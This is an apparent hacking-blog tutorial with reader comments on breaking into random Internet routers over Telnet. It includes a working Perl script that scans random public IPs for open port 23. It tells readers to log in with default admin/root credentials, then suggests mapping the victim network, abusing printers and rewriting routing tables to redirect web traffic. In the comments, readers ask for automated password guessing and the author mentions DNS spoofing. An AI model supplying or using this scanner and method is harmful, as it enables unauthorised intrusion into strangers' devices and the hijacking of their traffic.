Telnet is a legacy remote terminal TCP/IP application used for remote administration , Telnet is notorious for transmitting communications in plain text and has long since been superseded by SSH that uses encrypted channels so it is rare to see telnet in use on the Internet .
I this article I will explain how you can scan large number of routers for telnet services, which we can then attempt to use default credentials to log in
Hack Remote Routers Using Telnet
Things You Need:-
1. Random telnet scanner originally written by Solaris (modified by me) . The program attempts to open a connections to the telnet port (23) of random ips, if it succeeds the program logs the success in a log file telnet.txt for later analysis. The program then repeats, so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet boxes .Originally the program is written in Perl but i have modified it into a batch file
You can download the modified version of random telnet scanner from Here
and to get the password click Here
2. Telnet client
For windows XP/Linux users you will already have telnet client by default but for windows 7 users you will need to enable your telnet client by following these steps
Go to ----> Start ----->Control Panel ------> Programs And Features -------->Turn Windows features on or off ,now Check Telnet Client and Hit OK
After that you can start Telnet via Command Prompt ( Cmd )
Procedure
1. First run the remote telnet scanner for 20- 30 minutes and you will end up with 10 -20 telnet boxes

2. Now you have your list of IP's with the telnet port open in telnet.txt as shown
3. Now open your telnet client and connect to the ips you will be prompted for a username and password, try the common user names and passwords like
Admin -adminAdmin - "blank password "Root - rootRoot - "blank password "
A lot of routers disclose there model number in the telnet banner when you connect ,so a simple Google search often turns up the default user name and password. Otherwise move on to the next ip
4. From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. you can even port forward packets to printers and use them across the Internet to print out hundreds of copy's A funny concept that i have got to work in the past few days is with the routing tables and redirecting every web request to different sites
If the batch file is not working please copy paste the following code in a notepad and save it as router.pl , you also need active Perl to run this script
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223; #avoid experimental and multicast
my $range2 = 254;
$oct1 = int(rand($range1)) + 1; #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen(); #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return
}
return $ip; #return to caller
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){ # keeps code running indefinatly
$target = &ipgen(); # get random ip to scan
print "*??* SCANNING: $target \n"; # output
my $sock = new IO::Socket::INET ( # try to create socket to chose random address
PeerAddr => $target,
PeerPort => '23', # change this number to change ports you want to detect
Proto => 'tcp',
Timeout => '3', # you can get away with a timeout of 1 second but i have 2 to be safe
);
if($sock){ # if socket opened (port open)
print "*!!* SUCCESS-: $target \n"; # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File"); # open results file
print DAT "SUCCESS: $target \n"; # append findings to end of file
close(DAT); # close the file
}
close($sock); # close the socket
}################################################################
I'll try this over the weekend, this looks like a cool project. Thanks.
REPLYThe file just opens and closes...
REPLYI activated TELNET on my WINDOWS 7.
But it just keeps the same... :/
The scanner you have modified doesnt run as it states its evaluation licsence is expired??
REPLYcan u modified the perl script above to generaly check admin or root passwd for every host scanned ? thx bro
REPLYCan i access that Router Connected Computer files? please help me. Thanks.
REPLY@e-සිහිනය
I cant understand what you are asking, Please be more elaborate
I guess he is asking whether he can open the storage/files in the pc which is connected to a router
REPLY@Yashas h.r.
Once you break into a router there are many things that you can do it depends on the router the simple thing that u can do is dns spoofing
Ok, thanks. Hey, I've seen your wifi hacking posts and its working, can you please give a post on hacking wifi using android terminal emulator, i have rooted my phone(htc explorer) and have put cm9. Thanks :)
REPLYUse the form below to comment. No spam please!!!